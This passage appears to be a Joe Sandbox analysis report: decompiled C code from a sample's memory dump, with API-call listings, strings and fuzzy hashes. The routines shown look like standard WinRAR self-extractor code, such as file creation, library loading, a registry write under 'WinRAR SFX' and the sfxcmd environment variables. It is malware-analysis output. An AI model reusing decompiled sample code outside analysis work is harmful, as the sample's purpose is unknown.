						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00E88838(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00E91D00();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x00e8a36d
0x00e8a36e
0x00e8a36f
0x00e8a376
0x00e8a37a
0x00e8a37b
0x00e8a381
0x00e8a387
0x00e8a38d
0x00e8a390
0x00e8a390
0x00e8a393
0x00e8a395
0x00e8a395
0x00e8a393
0x00e8a397
0x00e8a39c
0x00e8a3a3
0x00e8a3a6
0x00e8a3a6
0x00e8a3c2
0x00e8a3c8
0x00e8a3cd
0x00e8a560
0x00e8a573
0x00e8a3d3
0x00e8a3d3
0x00e8a3d6
0x00e8a3db
0x00e8a3df
0x00e8a433
0x00e8a433
0x00e8a435
0x00e8a437
0x00e8a555
0x00e8a555
0x00e8a557
0x00e8a558
0x00000000
0x00e8a55e
0x00e8a448
0x00e8a44e
0x00e8a450
0x00000000
0x00000000
0x00e8a456
0x00e8a468
0x00e8a46d
0x00e8a471
0x00000000
0x00000000
0x00e8a47e
0x00e8a4b8
0x00e8a4bb
0x00e8a4be
0x00e8a4c0
0x00e8a4c2
0x00e8a4c4
0x00e8a510
0x00e8a510
0x00e8a512
0x00e8a512
0x00e8a514
0x00e8a54e
0x00e8a54f
0x00000000
0x00e8a554
0x00e8a528
0x00e8a52d
0x00e8a52f
0x00000000
0x00000000
0x00e8a533
0x00e8a534
0x00e8a535
0x00e8a538
0x00e8a574
0x00e8a577
0x00e8a53a
0x00e8a53a
0x00e8a53b
0x00e8a53b
0x00e8a548
0x00e8a54a
0x00e8a54c
0x00e8a57d
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8a54c
0x00e8a4c6
0x00e8a4c9
0x00e8a4cb
0x00e8a4cd
0x00e8a4cf
0x00e8a4d2
0x00e8a4d7
0x00e8a4f2
0x00e8a4f4
0x00e8a4fe
0x00e8a500
0x00e8a501
0x00e8a503
0x00000000
0x00000000
0x00e8a505
0x00e8a50b
0x00e8a50b
0x00000000
0x00e8a50b
0x00e8a4d9
0x00e8a4db
0x00e8a4df
0x00e8a4e4
0x00e8a4e6
0x00e8a4e8
0x00000000
0x00000000
0x00e8a4ea
0x00000000
0x00e8a4ea
0x00e8a480
0x00e8a485
0x00000000
0x00000000
0x00e8a48b
0x00e8a48d
0x00000000
0x00000000
0x00e8a4a4
0x00e8a4a9
0x00e8a4ad
0x00000000
0x00000000
0x00000000
0x00e8a4b3
0x00e8a3e6
0x00e8a3e8
0x00e8a3ea
0x00e8a3f2
0x00e8a411
0x00e8a413
0x00e8a41d
0x00e8a41f
0x00e8a420
0x00e8a422
0x00000000
0x00000000
0x00e8a428
0x00e8a42e
0x00e8a42e
0x00000000
0x00e8a42e
0x00e8a3f6
0x00e8a3fa
0x00e8a3ff
0x00e8a403
0x00000000
0x00000000
0x00e8a409
0x00000000
0x00e8a409

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,kR,00E8526B,?,?,?,00E8A5B9,00000001,00000001,8FE85006), ref: 00E8A3C2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E8A5B9,00000001,00000001,8FE85006,?,?,?), ref: 00E8A448
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E8A542
__freea.LIBCMT ref: 00E8A54F

Part of subcall function 00E88838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E83CF6,?,0000015D,?,?,?,?,00E851D2,000000FF,00000000,?,?), ref: 00E8886A

__freea.LIBCMT ref: 00E8A558
__freea.LIBCMT ref: 00E8A57D

Strings

kR, xrefs: 00E8A37A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: kR
API String ID: 1414292761-1039637683
Opcode ID: 2e0c39819ec472c9bef41d491c47463006a34a037ac21609a3506e2a4658901f
Instruction ID: 0a0f6ffa978be0bfcd5f850033e0839d2737923e0ad8a5286ebfed0a2ae94a57
Opcode Fuzzy Hash: 2e0c39819ec472c9bef41d491c47463006a34a037ac21609a3506e2a4658901f
Instruction Fuzzy Hash: 1851CD72600216AFEB25AFA4CC41EAF77A9EB40754B19563AFD0CF6150EB34DC808762

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A804 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00E8A804(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xec15e0 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xe96e90 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x8ae5c3d9
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00e8a809
0x00e8a80d
0x00e8a814
0x00e8a818
0x00e8a826
0x00e8a836
0x00e8a83c
0x00e8a840
0x00e8a869
0x00e8a86b
0x00e8a86f
0x00e8a872
0x00e8a872
0x00e8a878
0x00e8a87a
0x00000000
0x00e8a87b
0x00e8a842
0x00e8a84b
0x00e8a85a
0x00e8a84d
0x00e8a850
0x00e8a856
0x00e8a856
0x00e8a85e
0x00000000
0x00e8a860
0x00e8a863
0x00e8a865
0x00000000
0x00e8a865
0x00e8a85e
0x00e8a81a
0x00e8a81f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,_;,00000000,00000000,?,00E8A7AB,_;,00000000,00000000,00000000,?,00E8A9A8,00000006,FlsSetValue), ref: 00E8A836
GetLastError.KERNEL32(?,00E8A7AB,_;,00000000,00000000,00000000,?,00E8A9A8,00000006,FlsSetValue,00E97348,00E97350,00000000,00000364,?,00E89387), ref: 00E8A842
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E8A7AB,_;,00000000,00000000,00000000,?,00E8A9A8,00000006,FlsSetValue,00E97348,00E97350,00000000), ref: 00E8A850

Strings

_;, xrefs: 00E8A82D

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: _;
API String ID: 3177248105-796408444
Opcode ID: d6086f2255d07cc88ca4392a3e2be9617cf7c3524c391ac8adf97313963e0456
Instruction ID: ff3ef1e14a57ea664151ac23111c3c5465271df516eb0ba15c6d31495f133dda
Opcode Fuzzy Hash: d6086f2255d07cc88ca4392a3e2be9617cf7c3524c391ac8adf97313963e0456
Instruction Fuzzy Hash: F101F736601222AFE7256B7AAC4CAA67B58AF057A17181637F90EF3180D721DD06C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00E69B50 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00E69B50(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t49;
				long _t60;
				unsigned int _t62;
				long _t65;
				signed int _t66;
				char _t69;
				void* _t73;
				void* _t75;
				long _t79;
				void* _t82;

				_t75 = __esi;
				E00E7E630();
				_t62 = _a4188;
				_t73 = __ecx;
				 *(__ecx + 0x1024) =  *(__ecx + 0x1024) & 0x00000000;
				if( *((char*)(__ecx + 0x22)) != 0 || (_t62 & 0x00000004) != 0) {
					_t69 = 1;
				} else {
					_t69 = 0;
				}
				_push(_t75);
				asm("sbb esi, esi");
				_t79 = ( ~(_t62 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t62 & 0x00000001) != 0) {
					_t79 = _t79 | 0x40000000;
				}
				_t65 =  !(_t62 >> 3) & 0x00000001;
				if(_t69 != 0) {
					_t65 = _t65 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t73 + 0x1b)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00E67119( &_a12);
				if( *((char*)(_t73 + 0x20)) != 0) {
					_t79 = _t79 | 0x00000100;
				}
				_t49 = CreateFileW(_a4184, _t79, _t65, 0, 3, _v0, 0); // executed
				_t82 = _t49;
				if(_t82 != 0xffffffff) {
					L17:
					if( *((char*)(_t73 + 0x20)) != 0 && _t82 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t82, 0,  &_a4, 0);
					}
					 *((char*)(_t73 + 0x18)) = 0;
					_t66 = _t65 & 0xffffff00 | _t82 != 0xffffffff;
					 *((intOrPtr*)(_t73 + 0xc)) = 0;
					 *((char*)(_t73 + 0x10)) = 0;
					if(_t82 != 0xffffffff) {
						 *(_t73 + 4) = _t82;
						E00E70131(_t73 + 0x24, _a4184, 0x800);
						 *((char*)(_t73 + 0x21)) = 0;
					}
					return _t66;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00E6B85C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t73 + 0x1024)) = 1;
						}
						goto L17;
					}
					_t82 = CreateFileW( &_a12, _t79, _t65, 0, 3, _v0, 0);
					_t60 = GetLastError();
					if(_t60 == 2) {
						_a4.dwLowDateTime = _t60;
					}
					if(_t82 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x00e69b50
0x00e69b55
0x00e69b5b
0x00e69b64
0x00e69b66
0x00e69b71
0x00e69b7c
0x00e69b78
0x00e69b78
0x00e69b78
0x00e69b82
0x00e69b8a
0x00e69b92
0x00e69b9b
0x00e69b9d
0x00e69b9d
0x00e69ba8
0x00e69bad
0x00e69baf
0x00e69baf
0x00e69bc4
0x00e69bc8
0x00e69bd1
0x00e69bd3
0x00e69bd3
0x00e69bec
0x00e69bf2
0x00e69bf7
0x00e69c5b
0x00e69c60
0x00e69c67
0x00e69c70
0x00e69c7b
0x00e69c7b
0x00e69c86
0x00e69c89
0x00e69c8c
0x00e69c8f
0x00e69c95
0x00e69ca6
0x00e69caa
0x00e69caf
0x00e69caf
0x00e69cbe
0x00e69bf9
0x00e69bff
0x00e69c1b
0x00e69c4a
0x00e69c4f
0x00e69c51
0x00e69c51
0x00000000
0x00e69c4f
0x00e69c34
0x00e69c36
0x00e69c3f
0x00e69c41
0x00e69c41
0x00e69c48
0x00000000
0x00000000
0x00000000
0x00000000
0x00e69c48

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00E6797C,?,00000005,?,00000011), ref: 00E69BEC
GetLastError.KERNEL32(?,?,00E6797C,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E69BF9
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00E6797C,?,00000005,?), ref: 00E69C2E
GetLastError.KERNEL32(?,?,00E6797C,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E69C36
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E6797C,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E69C7B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 6349458378f529a7970a671854d7998571ba25c3b9b6d20f321ae6a28582aeaa
Instruction ID: 658ca84853b9978cccadfb33557519807a86ba6075b1be1ff3cb091f0f4aa8ee
Opcode Fuzzy Hash: 6349458378f529a7970a671854d7998571ba25c3b9b6d20f321ae6a28582aeaa
Instruction Fuzzy Hash: EE4133305847426FE7309B34EC05BDABBD8AB05368F10071AF9A5A61D2D3B4A998CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D4AF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E7D4AF(char* _a4) {
				void* _v8;
				int _v12;
				short _v4108;
				long _t16;

				E00E7E630();
				if( *0xeaa470 != 0) {
					_t26 =  *0xeaa472;
					if( *0xeaa472 != 0) {
						E00E7C040(_t26, 0xeaa472,  &_v4108, 0x800);
						_t16 = RegCreateKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12); // executed
						if(_t16 == 0) {
							RegSetValueExW(_v8,  &_v4108, 0, 1, _a4, 2 + E00E83883(_a4) * 2); // executed
							_t16 = RegCloseKey(_v8); // executed
						}
						return _t16;
					}
				}
				return 0x1008;
			}

0x00e7d4b7
0x00e7d4c3
0x00e7d4c5
0x00e7d4cd
0x00e7d4e1
0x00e7d503
0x00e7d50b
0x00e7d52e
0x00e7d537
0x00e7d537
0x00000000
0x00e7d53d
0x00e7d4cd
0x00e7d541

APIs

RegCreateKeyExW.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,00EAA472,?,00000800), ref: 00E7D503
RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 00E7D52E
RegCloseKey.KERNELBASE(?), ref: 00E7D537

Strings

Software\WinRAR SFX, xrefs: 00E7D4F9

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CloseCreateValue
String ID: Software\WinRAR SFX
API String ID: 1818849710-754673328
Opcode ID: 37bcd2f0739da9b2ec525e761d6efcf9793f54b3bb31b674e6ecd144999950e2
Instruction ID: 6c6418d99ef78c43695b7f9be83517008087bb2090a8c21a03374ec2a36d1ea5
Opcode Fuzzy Hash: 37bcd2f0739da9b2ec525e761d6efcf9793f54b3bb31b674e6ecd144999950e2
Instruction Fuzzy Hash: 75017131401218BBEB219B95DC0AFEB7FBDEF09758F004066B548B5060DBB15A88DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A558 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E7A558(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00E71AC4( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00e7a568
0x00e7a56f
0x00e7a577
0x00e7a57a
0x00e7a587
0x00e7a58e
0x00e7a596
0x00e7a59c
0x00e7a59c
0x00e7a59e
0x00e7a5a1
0x00e7a5a6
0x00000000
0x00e7a5a6
0x00e7a5b0

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00E7A56F
SHAutoComplete.SHLWAPI(?,00000010), ref: 00E7A5A6

Part of subcall function 00E71AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E6B250,?,?,?,00E6B1FE,?,-00000002,?,00000000,?), ref: 00E71ADA

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E7A596

Strings

EDIT, xrefs: 00E7A57A, 00E7A585, 00E7A592

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 04da23fa3148a7ee6d19d0b7a87136a1e564d7869057942958e9dbe051c4800d
Instruction ID: 077015faecf1ceef2ff68acd5b1eacacb6f37cc88d97471be1f61440ffb2ee02
Opcode Fuzzy Hash: 04da23fa3148a7ee6d19d0b7a87136a1e564d7869057942958e9dbe051c4800d
Instruction Fuzzy Hash: 83F089326413186BD7305A659C06FDF776C9B86B10F084076BE08B6180D7619A06C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A5C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00E7A5C6(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00E70360(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xec2180(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xec2034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00E7E506(); // executed
				 *0xec2088(0xea8430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x00e7a5d5
0x00e7a5dc
0x00e7a5df
0x00e7a5e8
0x00e7a5f0
0x00e7a5f7
0x00e7a601
0x00e7a60c
0x00e7a610
0x00e7a613
0x00e7a616
0x00e7a620
0x00e7a62d

APIs

Part of subcall function 00E70360: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E7037B
Part of subcall function 00E70360: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E6EE61,Crypt32.dll,00000000,00E6EEE5,?,?,00E6EEC7,?,?,?), ref: 00E7039D

OleInitialize.OLE32(00000000), ref: 00E7A5DF
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E7A616
SHGetMalloc.SHELL32(00EA8430), ref: 00E7A620

Strings

riched20.dll, xrefs: 00E7A5CE

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 85b4a39c837d25a0634dbf7b243ccd5150b2ecda2e98b673e255e480c546d278
Instruction ID: dacf1db1a2d5499497a1806b072679360005a6bec4012f73e7321f32bd291dfa
Opcode Fuzzy Hash: 85b4a39c837d25a0634dbf7b243ccd5150b2ecda2e98b673e255e480c546d278
Instruction Fuzzy Hash: C2F0ECB1D0020DABCB10AF9AD8499AFFBFCEB55705F00416AE914F2241DBB556058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D544 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00E7D544(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00E7E630();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E00E6FEB3(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00E6FFCC() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}

0x00e7d544
0x00e7d54c
0x00e7d55a
0x00e7d56f
0x00e7d574
0x00e7d578
0x00e7d57d
0x00e7d587
0x00e7d580
0x00e7d580
0x00e7d586
0x00e7d586
0x00e7d596
0x00e7d596
0x00e7d5a0

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00E7D55A
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E7D596

Strings

sfxcmd, xrefs: 00E7D555
sfxpar, xrefs: 00E7D591

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: d79bad0340c6cb578d0ba9fa2c05eb2eeebcf69750c00e92e48e9d547e711d9f
Instruction ID: e9fe5d5337504c4b1e4e433124dbeea8065e5de2e35c6eafc65c0f3c8a2fd75e
Opcode Fuzzy Hash: d79bad0340c6cb578d0ba9fa2c05eb2eeebcf69750c00e92e48e9d547e711d9f
Instruction Fuzzy Hash: 98F0A772805224E7CB212FD5AC0ABFE7BA8AF19745B005153FC88B6151D6718950DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E699EE Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00E699EE(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00E69B29(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00E699EE(_t25);
						}
					}
				}
				return _t15;
			}

0x00e699f1
0x00e699f3
0x00e699fa
0x00e69a04
0x00e69a04
0x00e69a16
0x00e69a1e
0x00e69a7a
0x00e69a20
0x00e69a22
0x00e69a29
0x00e69a42
0x00e69a46
0x00e69a57
0x00e69a5b
0x00e69a75
0x00e69a75
0x00e69a67
0x00e69a67
0x00e69a70
0x00000000
0x00e69a72
0x00e69a72
0x00000000
0x00e69a72
0x00e69a70
0x00e69a48
0x00e69a48
0x00e69a51
0x00000000
0x00e69a53
0x00e69a53
0x00e69a53
0x00e69a51
0x00e69a2b
0x00e69a2b
0x00e69a33
0x00000000
0x00e69a35
0x00e69a35
0x00e69a36
0x00e69a36
0x00e69a3b
0x00e69a3b
0x00e69a33
0x00e69a29
0x00e69a82

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E699FE
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00E69A16
GetLastError.KERNEL32 ref: 00E69A48
GetLastError.KERNEL32 ref: 00E69A67

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
